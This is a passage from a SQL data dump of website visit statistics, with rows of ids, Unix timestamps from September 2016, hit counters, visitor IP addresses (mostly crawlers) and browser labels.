66.164','other'),(61233,1473379576,1,1,0,0,'164.132.161.82','other'),(61234,1473379872,1,0,1,0,'66.249.76.45',''),(61235,1473379978,1,1,0,0,'66.102.9.27','other'),(61236,1473380090,1,1,0,0,'51.255.65.70','other'),(61237,1473380289,1,1,0,0,'163.172.66.90','other'),(61238,1473380457,1,1,0,0,'164.132.161.66','other'),(61239,1473381438,1,0,1,0,'66.249.76.45',''),(61240,1473382120,1,1,0,0,'51.255.65.57','other'),(61241,1473382479,1,1,0,0,'51.255.65.39','other'),(61242,1473383052,1,1,0,0,'164.132.161.58','other'),(61243,1473383231,1,1,0,0,'66.102.9.25','other'),(61244,1473383236,1,0,1,0,'66.249.75.179',''),(61245,1473383384,1,1,0,0,'163.172.64.247','other'),(61246,1473383399,1,1,0,0,'51.255.65.21','other'),(61247,1473384233,1,1,0,0,'163.172.65.233','other'),(61248,1473384903,1,1,0,0,'163.172.66.79','other'),(61249,1473385323,1,1,0,0,'40.77.167.15','other'),(61250,1473386500,1,1,0,0,'163.172.65.210','other'),(61251,1473387083,1,1,0,0,'163.172.65.24','other'),(61252,1473387678,2,2,0,0,'178.203.120.68','other'),(61253,1473387835,1,1,0,0,'163.172.65.39','other'),(61254,1473388155,1,1,0,0,'163.172.66.60','other'),(61255,1473388211,1,0,1,0,'66.249.75.183',''),(61256,1473388794,1,1,0,0,'40.77.167.15','other'),(61257,1473389073,1,1,0,0,'164.132.161.45','other'),(61258,1473389330,1,1,0,0,'51.255.65.48','other'),(61259,1473390304,1,1,0,0,'163.172.66.85','other'),(61260,1473390418,1,1,0,0,'157.55.39.52','other'),(61261,1473390581,1,1,0,0,'163.172.65.226','other'),(61262,1473391216,1,1,0,0,'163.172.65.217','other'),(61263,1473391419,1,1,0,0,'163.172.66.116','other'),(61264,1473391732,1,1,0,0,'163.172.64.234','other'),(61265,1473391808,1,1,0,0,'163.172.66.20','other'),(61266,1473391825,1,1,0,0,'51.255.65.64','other'),(61267,1473392135,2,0,2,0,'66.249.75.187',''),(61268,1473392751,1,1,0,0,'163.172.66.85','other'),(61269,1473393112,1,1,0,0,'164.132.161.9','other'),(61270,1473393113,1,1,0,0,'164.132.161.94','other'),(61271,1473393220,1,1,0,0,'163.172.66.125','other'),(61272,1473393794,1,1,0,0,'163.172.65.11','other'),(61273,1473394188,1,0,1,0,'66.249.75.179',''),(61274,1473394839,1,1,0,0,'5.228.254.216','other'),(61275,1473395060,1,1,0,0,'51.255.65.60','other'),(61276,1473395606,1,1,0,0,'207.46.13.103','other'),(61277,1473396170,1,1,0,0,'51.255.65.39','other'),(61278,1473396838,1,1,0,0,'163.172.64.225','other'),(61279,1473396890,1,1,0,0,'163.172.66.8','other'),(61280,1473396934,1,1,0,0,'163.172.65.215','other'),(61281,1473397071,1,1,0,0,'82.145.220.20','other'),(61282,1473397305,1,1,0,0,'163.172.66.136','other'),(61283,1473397509,1,0,1,0,'66.249.69.69',''),(61284,1473397682,1,1,0,0,'130.193.50.34','other'),(61285,1473399244,1,1,0,0,'94.179.48.25','firefox'),(61286,1473399259,1,1,0,0,'37.52.27.224','chrome'),(61287,1473399880,1,1,0,0,'163.172.64.234','other'),(61288,1473401277,1,1,0,0,'164.132.161.15','other'),(61289,1473401404,1,1,0,0,'163.172.64.177','other'),(61290,1473402676,1,1,0,0,'164.132.161.29','other'),(61291,1473404000,1,1,0,0,'176.241.109.84','firefox'),(61292,1473404178,1,1,0,0,'37.55.160.149','chrome'),(61293,1473405762,1,1,0,0,'51.255.65.78','other'),(61294,1473407247,1,1,0,0,'51.255.65.42','other'),(61295,1473407635,1,1,0,0,'163.172.66.16','other'),(61296,1473407860,1,1,0,0,'163.172.65.40','other'),(61297,1473407901,1,1,0,0,'91.196.178.66','firefox'),(61298,1473408168,1,0,1,0,'66.249.75.179',''),(61299,1473408266,1,1,0,0,'51.255.65.58','other'),(61300,1473408306,1,1,0,0,'163.172.65.199','other'),(61301,1473408327,1,1,0,0,'46.150.1.38','chrome'),(61302,1473408342,1,1,0,0,'141.8.183.25','other'),(61303,1473408684,1,1,0,0,'163.172.65.64','other'),(61304,1473409484,1,1,0,0,'164.132.161.69','other'),(61305,1473409539,1,1,0,0,'180.76.15.152','other'),(61306,1473409815,1,1,0,0,'164.132.161.38','other'),(61307,1473410156,2,2,0,0,'174.34.135.242','other'),(61308,1473410312,1,1,0,0,'164.132.161.13','other'),(61309,1473410427,1,1,0,0,'163.172.65.50','other'),(61310,1473411084,1,1,0,0,'193.107.72.82','chrome'),(61311,1473411724,1,1,0,0,'62.210.148.91','chrome'),(61312,1473411915,1,1,0,0,'141.8.183.25','other'),(61313,1473412122,1,1,0,0,'92.113.174.152','firefox'),(61314,1473412271,1,1,0,0,'163.172.66.90','other'),(61315,1473412550,1,1,0,0,'91.196.178.134','chrome'),(61316,1473412853,1,1,0,0,'213.108.41.140','chrome'),(61317,1473413140,1,0,1,0,'66.249.75.187',''),(61318,1473413439,1,1,0,0,'163.172.66.66','other'),(61319,1473414585,1,1,0,0,'180.76.15.14','other'),(61320,1473416118,1,1,0,0,'66.249.93.13','chrome'),(61321,1473417017,1,1,0,0,'163.172.66.178','other'),(61322,1473417493,1,1,0,0,'51.255.65.50','other'),(61323,1473417548,1,1,0,0,'95.132.110.196','chrome'),(61324,1473417594,1,1,0,0,'141.8.183.25','other'),(61325,1473417665,1,1,0,0,'91.196.178.65','chrome'),(61326,1473417808,1,1,0,0,'163.172.66.170','other'),(61327,1473418759,1,1,0,0,'163.172.65.235','other'),(61328,1473419205,1,1,0,0,'163.172.66.85','other'),(61329,1473419461,1,1,0,0,'163.172.65.122','other'),(61330,1473419843,1,1,0,0,'66.102.9.29','chrome'),(61331,1473419904,1,1,0,0,'91.196.178.164','chrome'),(61332,1473420257,1,1,0,0,'164.132.161.72','other'),(61333,1473420573,1,1,0,0,'51.255.65.23','other'),(61334,1473421263,1,1,0,0,'163.172.66.141','other'),(61335,1473421391,1,1,0,0,'51.255.65.73','other'),(61336,1473422582,1,0,1,0,'66.249.75.183',''),(61337,1473422612,1,0,1,0,'66.249.75.179',''),(61338,1473422749,1,1,0,0,'82.207.91.234','firefox'),(61339,1473422917,1,1,0,0,'164.132.161.14','other'),(61340,1473423101,1,1,0,0,'163.172.66.29','other'),(61341,1473423182,1,1,0,0,'178.151.34.194','chrome'),(61342,1473423185,1,1,0,0,'178.92.58.208','chrome'),(61343,1473423308,1,1,0,0,'163.172.66.168','other'),(61344,1473423994,1,1,0,0,'91.196.178.164','chrome'),(61345,1473424611,1,0,1,0,'66.249.75.179',''),(61346,1473425058,1,1,0,0,'178.54.173.8','chrome'),(61347,1473425533,1,1,0,0,'164.132.161.58','other'),(61348,1473426389,1,1,0,0,'94.153.208.164','chrome'),(61349,1473426402,1,1,0,0,'91.196.178.38','chrome'),(61350,1473427447,1,1,0,0,'51.255.65.40','other'),(61351,1473427471,1,1,0,0,'164.132.161.15','other'),(61352,1473427863,1,1,0,0,'51.255.65.69','other'),(61353,1473428708,1,1,0,0,'163.172.64.225','other'),(61354,1473429030,1,1,0,0,'51.255.65.46','other'),(61355,1473429908,1,1,0,0,'163.172.65.6','other'),(61356,1473429987,1,1,0,0,'164.132.161.50','other'),(61357,1473430065,1,1,0,0,'163.172.64.231','other'),(61358,1473430173,1,1,0,0,'163.172.65.19','other'),(61359,1473430229,1,1,0,0,'163.172.65.186','other'),(61360,1473430575,1,1,0,0,'204.79.180.154','msie'),(61361,1473430794,1,1,0,0,'164.132.161.83','other'),(61362,1473431123,1,1,0,0,'163.172.66.159','other'),(61363,1473431136,1,1,0,0,'163.172.66.90','other'),(61364,1473431705,1,1,0,0,'163.172.65.48','other'),(61365,1473432136,1,0,1,0,'66.249.75.179',''),(61366,1473432323,1,1,0,0,'130.193.51.19','other'),(61367,1473432489,1,0,1,0,'66.249.75.183',''),(61368,1473434625,1,0,1,0,'66.249.69.74',''),(61369,1473435893,1,1,0,0,'164.132.161.24','other'),(61370,1473436291,1,1,0,0,'163.172.66.26','other'),(61371,1473436777,1,1,0,0,'163.172.66.80','other'),(61372,1473437279,1,1,0,0,'213.251.184.38','other'),(61373,1473437349,1,1,0,0,'163.172.65.131','other'),(61374,1473437796,1,1,0,0,'51.255.65.92','other'),(61375,1473438728,1,0,1,0,'66.249.75.179',''),(61376,1473439731,1,1,0,0,'163.172.66.13','other'),(61377,1473439872,1,1,0,0,'40.77.167.28','other'),(61378,1473440496,1,1,0,0,'163.172.65.24','other'),(61379,1473440595,2,0,2,0,'66.249.69.185',''),(61380,1473440975,1,1,0,0,'163.172.65.14','other'),(61381,1473441590,1,1,0,0,'51.255.65.15','other'),(61382,1473442031,1,0,1,0,'66.249.69.185',''),(61383,1473442541,1,1,0,0,'82.145.220.212','other'),(61384,1473442783,1,1,0,0,'164.132.161.50','other'),(61385,1473442840,1,1,0,0,'163.172.65.197','other'),(61386,1473442854,1,1,0,0,'164.132.161.2','other'),(61387,1473442871,1,1,0,0,'5.255.253.47','other'),(61388,1473443109,1,1,0,0,'163.172.65.182','other'),(61389,1473443474,1,1,0,0,'207.46.13.103','other'),(61390,1473443831,1,1,0,0,'5.255.253.68','other'),(61391,1473443914,1,0,1,0,'66.249.69.79',''),(61392,1473444192,1,1,0,0,'163.172.66.83','other'),(61393,1473444277,1,1,0,0,'92.244.103.204','other'),(61394,1473444312,1,1,0,0,'163.172.65.59','other'),(61395,1473444717,1,1,0,0,'77.120.20.224','chrome'),(61396,1473444768,1,1,0,0,'94.179.125.206','chrome'),(61397,1473445078,1,1,0,0,'91.196.178.38','chrome'),(61398,1473445137,1,1,0,0,'51.255.65.43','other'),(61399,1473445176,1,1,0,0,'51.255.65.35','other'),(61400,1473445589,1,1,0,0,'94.179.82.229','chrome'),(61401,1473445796,1,0,1,0,'66.249.69.189',''),(61402,1473445811,2,2,0,0,'130.193.50.34','other'),(61403,1473446164,1,1,0,0,'77.120.20.224','chrome'),(61404,1473447395,1,1,0,0,'91.196.178.71','chrome'),(61405,1473447841,1,0,1,0,'66.249.69.79',''),(61406,1473448162,1,1,0,0,'51.255.65.14','other'),(61407,1473448359,1,1,0,0,'82.145.222.4','chrome'),(61408,1473448661,1,1,0,0,'174.129.237.157','other'),(61409,1473448710,1,1,0,0,'163.172.66.22','other'),(61410,1473448961,1,1,0,0,'180.76.15.135','other'),(61411,1473449102,1,1,0,0,'163.172.66.178','other'),(61412,1473449109,1,0,1,0,'66.249.69.187',''),(61413,1473449986,1,1,0,0,'163.172.64.241','other'),(61414,1473450642,1,0,1,0,'66.249.69.189',''),(61415,1473452398,2,0,2,0,'66.249.69.187',''),(61416,1473452590,1,1,0,0,'164.132.161.61','other'),(61417,1473452668,1,1,0,0,'164.132.161.28','other'),(61418,1473452782,1,1,0,0,'180.76.15.148','other'),(61419,1473453819,1,1,0,0,'130.193.50.34','other'),(61420,1473453966,1,0,1,0,'66.249.69.187',''),(61421,1473454563,1,1,0,0,'91.196.178.65','firefox'),(61422,1473454769,1,1,0,0,'5.255.250.41','other'),(61423,1473455901,1,1,0,0,'164.132.161.31','other'),(61424,1473456033,1,1,0,0,'163.172.66.62','other'),(61425,1473456910,1,0,1,0,'66.249.69.187',''),(61426,1473457177,1,1,0,0,'51.255.65.51','other'),(61427,1473457257,1,1,0,0,'163.172.66.120','other'),(61428,1473457558,1,1,0,0,'163.172.66.94','other'),(61429,1473458298,1,1,0,0,'91.196.178.168','chrome'),(61430,1473458819,1,1,0,0,'164.132.161.69','other'),(61431,1473459046,1,1,0,0,'164.132.161.67','other'),(61432,1473459508,1,1,0,0,'163.172.64.245','other'),(61433,1473459653,1,1,0,0,'163.172.66.76','other'),(61434,1473459757,1,1,0,0,'163.172.65.109','other'),(61435,1473460134,1,1,0,0,'130.193.51.19','other'),(61436,1473460461,1,0,1,0,'66.249.69.69',''),(61437,1473460641,1,1,0,0,'163.172.65.50','other'),(61438,1473461227,1,1,0,0,'51.255.65.26','other'),(61439,1473461425,1,1,0,0,'180.76.15.29','other'),(61440,1473461461,1,1,0,0,'163.172.65.111','other'),(61441,1473461580,1,1,0,0,'164.132.161.59','other'),(61442,1473461763,1,1,0,0,'164.132.161.75','other'),(61443,1473462676,1,1,0,0,'51.255.65.40','other'),(61444,1473462842,1,0,1,0,'66.249.64.185',''),(61445,1473464429,1,1,0,0,'51.255.65.85','other'),(61446,1473464484,2,1,1,0,'66.249.64.59',''),(61447,1473464504,1,0,1,0,'66.249.64.185',''),(61448,1473464578,1,1,0,0,'51.255.65.20','other'),(61449,1473465181,1,1,0,0,'163.172.66.129','other'),(61450,1473465687,1,1,0,0,'163.172.66.137','other'),(61451,1473465849,1,1,0,0,'163.172.65.120','other'),(61452,1473466160,1,1,0,0,'66.249.64.185','chrome'),(61453,1473469045,1,1,0,0,'163.172.66.39','other'),(61454,1473469197,1,1,0,0,'163.172.66.14','other'),(61455,1473470083,1,1,0,0,'103.16.229.186','other'),(61456,1473470382,1,0,1,0,'68.180.230.222',''),(61457,1473471347,1,1,0,0,'51.255.65.46','other'),(61458,1473471358,1,1,0,0,'164.132.161.54','other'),(61459,1473472139,1,1,0,0,'163.172.65.32','other'),(61460,1473472621,1,1,0,0,'163.172.66.95','other'),(61461,1473472693,1,1,0,0,'163.172.64.193','other'),(61462,1473474161,1,1,0,0,'163.172.66.33','other'),(61463,1473474203,1,1,0,0,'163.172.65.65','other'),(61464,1473475007,1,1,0,0,'195.154.185.20','other'),(61465,1473475232,1,1,0,0,'163.172.66.99','other'),(61466,1473476787,1,1,0,0,'164.132.161.52','other'),(61467,1473477880,1,1,0,0,'164.132.161.31','other'),(61468,1473477933,2,1,1,0,'66.249.64.185',''),(61469,1473477967,1,1,0,0,'66.249.64.187','chrome'),(61470,1473477978,1,1,0,0,'66.249.64.59','chrome'),(61471,1473478803,1,0,1,0,'66.249.64.189',''),(61472,1473479222,1,1,0,0,'163.172.66.44','other'),(61473,1473479318,1,1,0,0,'130.193.50.34','other'),(61474,1473480356,2,0,2,0,'66.249.64.185',''),(61475,1473481187,1,0,1,0,'66.249.64.187',''),(61476,1473481879,1,1,0,0,'163.172.65.49','other'),(61477,1473482896,1,1,0,0,'163.172.65.106','other'),(61478,1473483165,1,1,0,0,'51.255.65.64','other'),(61479,1473483168,1,1,0,0,'51.255.65.16','other'),(61480,1473484120,1,1,0,0,'164.132.161.32','other'),(61481,1473484166,1,1,0,0,'164.132.161.66','other'),(61482,1473484887,1,1,0,0,'163.172.65.195','other'),(61483,1473485114,1,1,0,0,'180.76.15.163','other'),(61484,1473485552,1,1,0,0,'51.255.65.9','other'),(61485,1473485930,1,1,0,0,'40.77.167.15','other'),(61486,1473486254,1,1,0,0,'51.255.65.85','other'),(61487,1473486260,1,1,0,0,'164.132.161.79','other'),(61488,1473488762,1,1,0,0,'163.172.66.16','other'),(61489,1473489831,1,1,0,0,'163.172.65.56','other'),(61490,1473490152,1,0,1,0,'66.249.64.187',''),(61491,1473493005,1,0,1,0,'66.249.64.185',''),(61492,1473493071,2,2,0,0,'69.197.177.50','other'),(61493,1473493666,1,1,0,0,'163.172.65.7','other'),(61494,1473493857,3,3,0,0,'195.154.185.20','other'),(61495,1473494158,1,0,1,0,'66.249.64.187',''),(61496,1473495191,1,1,0,0,'51.255.65.32','other'),(61497,1473495312,1,1,0,0,'51.255.65.61','other'),(61498,1473495640,1,1,0,0,'66.249.93.13','chrome'),(61499,1473495933,1,1,0,0,'51.255.65.56','other'),(61500,1473496320,1,1,0,0,'51.255.65.79','other'),(61501,1473496335,1,0,1,0,'66.249.64.189',''),(61502,1473497015,1,1,0,0,'164.132.161.58','other'),(61503,1473497058,1,1,0,0,'164.132.161.62','other'),(61504,1473497164,1,1,0,0,'66.249.64.57','chrome'),(61505,1473497830,1,1,0,0,'51.255.65.19','other'),(61506,1473498257,1,1,0,0,'51.255.65.79','other'),(61507,1473499774,1,0,1,0,'68.180.228.185',''),(61508,1473500055,2,2,0,0,'66.249.64.187','chrome'),(61509,1473500439,1,1,0,0,'163.172.64.235','other'),(61510,1473500455,2,2,0,0,'66.249.64.185','chrome'),(61511,1473501178,1,1,0,0,'163.172.66.121','other'),(61512,1473501547,1,1,0,0,'163.172.66.151','other'),(61513,1473501578,1,1,0,0,'163.172.64.181','other'),(61514,1473501744,1,0,1,0,'66.249.64.185',''),(61515,1473502304,1,1,0,0,'51.255.65.92','other'),(61516,1473502383,1,1,0,0,'51.255.65.74','other'),(61517,1473502568,1,1,0,0,'163.172.66.107','other'),(61518,1473502962,1,1,0,0,'51.255.65.2','other'),(61519,1473503458,1,1,0,0,'46.211.7.165','chrome'),(61520,1473503857,1,1,0,0,'94.179.0.121','firefox'),(61521,1473504114,2,2,0,0,'66.249.64.61','chrome'),(61522,1473504365,1,1,0,0,'51.255.65.43','other'),(61523,1473505211,1,1,0,0,'66.249.64.185','chrome'),(61524,1473505543,1,1,0,0,'207.46.13.113','other'),(61525,1473505969,1,0,1,0,'66.249.64.187',''),(61526,1473507492,1,1,0,0,'163.172.65.242','other'),(61527,1473507688,1,1,0,0,'163.172.66.115','other'),(61528,1473507769,1,1,0,0,'207.46.13.113','other'),(61529,1473508040,2,2,0,0,'51.255.65.61','other'),(61530,1473508223,1,1,0,0,'164.132.161.51','other'),(61531,1473508485,1,1,0,0,'66.249.64.57','chrome'),(61532,1473509071,1,1,0,0,'94.179.104.141','chrome'),(61533,1473509099,1,1,0,0,'51.255.65.45','other'),(61534,1473509184,3,3,0,0,'146.185.153.226','other'),(61535,1473509957,1,1,0,0,'164.132.161.21','other'),(61536,1473509982,1,1,0,0,'164.132.161.11','other'),(61537,1473510095,2,2,0,0,'146.185.153.226','other'),(61538,1473510646,1,1,0,0,'94.179.104.141','chrome'),(61539,1473510798,1,0,1,0,'66.249.64.57',''),(61540,1473510916,1,0,1,0,'66.249.64.189',''),(61541,1473511896,1,0,1,0,'66.249.64.185',''),(61542,1473512040,1,1,0,0,'51.255.65.34','other'),(61543,1473512061,1,0,1,0,'66.249.64.187',''),(61544,1473512470,1,1,0,0,'163.172.66.164','other'),(61545,1473512550,1,1,0,0,'217.69.133.169','firefox'),(61546,1473513366,1,1,0,0,'163.172.65.30','other'),(61547,1473513588,1,1,0,0,'163.172.66.136','other'),(61548,1473513665,1,0,1,0,'66.249.64.187',''),(61549,1473513765,1,1,0,0,'163.172.65.184','other'),(61550,1473513989,1,1,0,0,'164.132.161.50','other'),(61551,1473517510,1,0,1,0,'66.249.64.185',''),(61552,1473519143,1,1,0,0,'91.196.178.38','firefox'),(61553,1473520036,1,1,0,0,'51.255.65.59','other'),(61554,1473520099,1,1,0,0,'164.132.161.80','other'),(61555,1473520513,1,0,1,0,'66.249.64.187',''),(61556,1473520943,1,1,0,0,'164.132.161.60','other'),(61557,1473521682,1,1,0,0,'51.255.65.79','other'),(61558,1473521732,1,0,1,0,'66.249.64.189',''),(61559,1473521951,3,0,3,0,'66.249.64.185',''),(61560,1473522413,1,1,0,0,'141.0.12.132','chrome'),(61561,1473522488,1,1,0,0,'66.249.64.187','chrome'),(61562,1473522627,1,0,1,0,'66.249.64.57',''),(61563,1473523273,1,1,0,0,'66.249.76.47','chrome'),(61564,1473523363,1,1,0,0,'51.255.65.56','other'),(61565,1473523684,1,1,0,0,'163.172.65.240','other'),(61566,1473524071,1,0,1,0,'66.249.76.45',''),(61567,1473524090,1,1,0,0,'164.132.161.9','other'),(61568,1473524218,1,1,0,0,'51.255.65.2','other'),(61569,1473524666,1,1,0,0,'163.172.65.64','other'),(61570,1473524743,4,4,0,0,'144.76.8.132','other'),(61571,1473524906,1,0,1,0,'66.249.76.47',''),(61572,1473525514,1,1,0,0,'51.255.65.41','other'),(61573,1473525519,1,1,0,0,'51.255.65.62','other'),(61574,1473525556,1,1,0,0,'163.172.65.241','other'),(61575,1473525721,1,1,0,0,'163.172.65.65','other'),(61576,1473525808,1,1,0,0,'163.172.65.67','other'),(61577,1473526595,1,0,1,0,'66.249.66.84',''),(61578,1473526653,2,0,2,0,'66.249.76.47',''),(61579,1473527154,1,1,0,0,'178.94.172.93','chrome'),(61580,1473527653,2,0,2,0,'66.249.76.46',''),(61581,1473527801,1,1,0,0,'51.255.65.14','other'),(61582,1473528039,1,1,0,0,'163.172.66.108','other'),(61583,1473528299,1,1,0,0,'180.76.15.24','other'),(61584,1473528705,1,0,1,0,'66.249.66.84',''),(61585,1473529549,1,1,0,0,'163.172.66.83','other'),(61586,1473530085,4,4,0,0,'162.210.196.98','other'),(61587,1473530663,1,0,1,0,'66.249.76.46',''),(61588,1473531159,1,1,0,0,'163.172.66.111','other'),(61589,1473532093,1,1,0,0,'164.132.161.81','other'),(61590,1473532114,1,0,1,0,'66.249.76.79',''),(61591,1473532486,6,6,0,0,'144.76.8.132','other'),(61592,1473533754,2,1,1,0,'66.249.76.47',''),(61593,1473534042,1,1,0,0,'82.145.222.80','other'),(61594,1473534554,1,0,1,0,'66.249.66.84',''),(61595,1473534664,1,1,0,0,'66.249.66.84','chrome'),(61596,1473535183,1,1,0,0,'51.255.65.62','other'),(61597,1473535393,1,1,0,0,'51.255.65.54','other'),(61598,1473535718,1,1,0,0,'163.172.65.61','other'),(61599,1473536769,1,1,0,0,'163.172.65.35','other'),(61600,1473536926,1,1,0,0,'164.132.161.22','other'),(61601,1473537713,1,1,0,0,'174.129.237.157','other'),(61602,1473537830,1,1,0,0,'164.132.161.44','other'),(61603,1473538279,1,0,1,0,'66.249.76.47',''),(61604,1473538513,1,1,0,0,'164.132.161.54','other'),(61605,1473538763,1,1,0,0,'157.55.39.52','other'),(61606,1473540667,1,1,0,0,'188.32.55.21','msie'),(61607,1473540669,1,1,0,0,'93.80.145.250','msie'),(61608,1473540671,1,1,0,0,'5.18.217.107','msie'),(61609,1473541354,1,1,0,0,'66.249.76.46','chrome'),(61610,1473542610,1,0,1,0,'66.249.76.46',''),(61611,1473542714,1,1,0,0,'66.249.76.45','chrome'),(61612,1473544231,1,1,0,0,'66.249.76.45','chrome'),(61613,1473545086,1,1,0,0,'174.129.237.157','other'),(61614,1473547272,1,0,1,0,'66.249.66.87',''),(61615,1473548974,1,1,0,0,'66.249.76.77','chrome'),(61616,1473549049,1,0,1,0,'66.249.76.46',''),(61617,1473549692,1,0,1,0,'66.249.76.79',''),(61618,1473550091,1,1,0,0,'157.55.39.6','other'),(61619,1473555008,2,2,0,0,'193.111.140.106','other'),(61620,1473555030,1,1,0,0,'66.249.76.46','chrome'),(61621,1473557185,1,0,1,0,'66.249.66.87',''),(61622,1473558576,1,1,0,0,'107.21.1.8','other'),(61623,1473559084,1,1,0,0,'92.113.174.152','firefox'),(61624,1473559156,1,0,1,0,'66.249.66.81',''),(61625,1473561034,2,2,0,0,'5.9.142.226','other'),(61626,1473564026,1,1,0,0,'163.172.65.13','other'),(61627,1473564556,1,1,0,0,'162.210.196.130','other'),(61628,1473565105,2,2,0,0,'69.30.213.138','other'),(61629,1473565263,1,1,0,0,'157.55.39.6','other'),(61630,1473566080,1,1,0,0,'180.76.15.14','other'),(61631,1473566151,1,0,1,0,'66.249.76.47',''),(61632,1473566239,1,1,0,0,'40.77.167.89','other'),(61633,1473566478,1,0,1,0,'66.249.76.45',''),(61634,1473566487,1,0,1,0,'66.249.76.79',''),(61635,1473567969,1,1,0,0,'163.172.66.104','other'),(61636,1473569517,1,1,0,0,'164.132.161.59','other'),(61637,1473569837,1,1,0,0,'51.255.65.60','other'),(61638,1473570410,1,0,1,0,'66.249.76.45',''),(61639,1473570471,2,2,0,0,'51.255.51.250','other'),(61641,1473571600,1,1,0,0,'164.132.161.14','other'),(61642,1473572067,1,1,0,0,'163.172.65.230','other'),(61643,1473574903,1,1,0,0,'163.172.66.93','other'),(61644,1473575947,1,1,0,0,'164.132.161.86','other'),(61645,1473577114,4,4,0,0,'69.30.198.178','other'),(61646,1473577393,1,1,0,0,'163.172.65.14','other'),(61647,1473577610,1,1,0,0,'51.255.65.38','other'),(61648,1473580961,1,1,0,0,'164.132.161.87','other'),(61649,1473581928,1,1,0,0,'157.55.39.6','other'),(61650,1473582508,1,1,0,0,'168.235.206.197','other'),(61651,1473582573,1,1,0,0,'163.172.65.20','other'),(61652,1473582577,1,1,0,0,'91.196.178.37','other'),(61653,1473582596,1,1,0,0,'157.55.39.0','other'),(61654,1473583034,1,1,0,0,'51.255.65.58','other'),(61655,1473583061,1,1,0,0,'163.172.65.234','other'),(61656,1473583390,1,1,0,0,'51.255.65.96','other'),(61657,1473584035,1,1,0,0,'51.255.65.36','other'),(61658,1473584466,1,1,0,0,'164.132.161.21','other'),(61659,1473584471,1,1,0,0,'51.255.65.97','other'),(61660,1473584703,1,1,0,0,'157.55.39.0','other'),(61661,1473584894,1,1,0,0,'163.172.65.67','other'),(61662,1473585363,1,1,0,0,'66.249.93.15','chrome'),(61663,1473585680,1,1,0,0,'51.255.65.18','other'),(61664,1473586470,1,1,0,0,'163.172.65.204','other'),(61665,1473587561,1,1,0,0,'91.196.178.38','firefox'),(61666,1473588281,1,1,0,0,'51.255.65.84','other'),(61667,1473588299,1,1,0,0,'164.132.161.32','other'),(61668,1473588410,1,0,1,0,'66.249.66.84',''),(61669,1473588520,1,1,0,0,'164.132.161.19','other'),(61670,1473588909,1,1,0,0,'37.55.226.113','chrome'),(61671,1473589021,1,1,0,0,'164.132.161.51','other'),(61672,1473589042,3,0,3,0,'66.249.76.45',''),(61673,1473589098,1,1,0,0,'51.255.65.60','other'),(61674,1473589782,1,1,0,0,'163.172.66.147','other'),(61675,1473590747,1,1,0,0,'163.172.65.52','other'),(61676,1473591061,1,1,0,0,'163.172.66.7','other'),(61677,1473591716,1,1,0,0,'164.132.161.80','other'),(61678,1473593020,1,1,0,0,'40.77.167.56','other'),(61679,1473593365,1,1,0,0,'164.132.161.87','other'),(61680,1473593394,1,1,0,0,'66.249.66.84','chrome'),(61681,1473593641,1,1,0,0,'51.255.65.16','other'),(61682,1473593886,1,1,0,0,'163.172.65.126','other'),(61683,1473595376,1,1,0,0,'91.196.178.38','firefox'),(61684,1473595855,8,8,0,0,'51.254.32.67','other'),(61685,1473596151,1,1,0,0,'164.132.161.77','other'),(61686,1473597251,1,1,0,0,'66.249.76.46','chrome'),(61687,1473597683,1,1,0,0,'66.249.76.79','chrome'),(61688,1473598696,1,1,0,0,'180.76.15.27','other'),(61689,1473599049,1,1,0,0,'180.76.15.19','other'),(61690,1473599694,1,1,0,0,'163.172.65.205','other'),(61691,1473600282,1,1,0,0,'51.255.65.78','other'),(61692,1473601826,1,1,0,0,'81.109.65.38','other'),(61693,1473602062,1,1,0,0,'163.172.64.233','other'),(61694,1473602073,1,1,0,0,'164.132.161.71','other'),(61695,1473602172,1,1,0,0,'164.132.161.94','other'),(61696,1473602643,1,1,0,0,'66.249.76.46','chrome'),(61697,1473602807,1,0,1,0,'66.249.76.81',''),(61698,1473602961,1,1,0,0,'164.132.161.30','other'),(61699,1473603667,1,1,0,0,'51.255.65.77','other'),(61700,1473604695,1,1,0,0,'164.132.161.75','other'),(61701,1473604832,1,0,1,0,'66.249.76.45',''),(61702,1473604838,1,0,1,0,'66.249.66.84',''),(61703,1473605278,1,1,0,0,'51.255.65.50','other'),(61704,1473605795,1,1,0,0,'51.255.65.9','other'),(61705,1473605866,4,4,0,0,'85.17.112.142','other'),(61706,1473607103,1,1,0,0,'144.76.12.78','other'),(61707,1473607531,1,1,0,0,'164.132.161.67','other'),(61708,1473607673,1,1,0,0,'51.255.65.72','other'),(61709,1473607741,2,2,0,0,'195.154.185.20','other'),(61710,1473608004,1,1,0,0,'51.255.65.74','other'),(61711,1473608414,3,0,3,0,'66.249.76.47',''),(61712,1473608744,1,1,0,0,'51.255.65.11','other'),(61713,1473609352,1,1,0,0,'82.145.221.180','opera'),(61714,1473610003,1,1,0,0,'163.172.64.186','other'),(61715,1473610840,1,0,1,0,'66.249.76.47',''),(61717,1473610975,1,0,1,0,'66.249.76.45',''),(61718,1473611253,1,1,0,0,'62.210.148.91','chrome'),(61719,1473611421,1,1,0,0,'163.172.65.16','other'),(61720,1473612704,1,1,0,0,'164.132.161.41','other'),(61721,1473612773,1,1,0,0,'141.0.13.28','opera'),(61722,1473613140,1,1,0,0,'164.132.161.10','other'),(61723,1473613832,1,1,0,0,'92.113.174.152','firefox'),(61724,1473613869,1,1,0,0,'188.163.75.56','firefox'),(61725,1473614177,1,1,0,0,'163.172.66.163','other'),(61726,1473614350,1,1,0,0,'163.172.66.34','other'),(61727,1473615121,1,1,0,0,'51.255.65.95','other'),(61728,1473616731,1,1,0,0,'164.132.161.17','other'),(61729,1473617508,1,1,0,0,'141.0.13.170','opera'),(61730,1473617856,1,1,0,0,'163.172.65.22','other'),(61731,1473618082,1,0,1,0,'68.180.228.173',''),(61732,1473618394,1,0,1,0,'66.249.76.45',''),(61733,1473619372,1,1,0,0,'141.0.13.170','opera'),(61734,1473619415,1,1,0,0,'51.255.65.61','other'),(61735,1473620224,1,1,0,0,'163.172.65.241','other'),(61736,1473623158,1,0,1,0,'66.249.76.79',''),(61737,1473624698,1,1,0,0,'164.132.161.33','other'),(61738,1473625006,1,1,0,0,'164.132.161.84','other'),(61739,1473625319,1,1,0,0,'164.132.161.8','other'),(61740,1473625671,1,1,0,0,'66.249.66.81','chrome'),(61741,1473627020,1,1,0,0,'164.132.161.4','other'),(61742,1473628074,1,1,0,0,'66.249.76.79','chrome'),(61743,1473628492,1,1,0,0,'157.55.39.52','other'),(61744,1473628770,1,1,0,0,'163.172.66.32','other'),(61745,1473629548,1,0,1,0,'66.249.76.45',''),(61746,1473630371,1,1,0,0,'164.132.161.87','other'),(61747,1473630912,1,1,0,0,'51.255.65.86','other'),(61748,1473631396,1,1,0,0,'164.132.161.15','other'),(61749,1473632380,1,1,0,0,'51.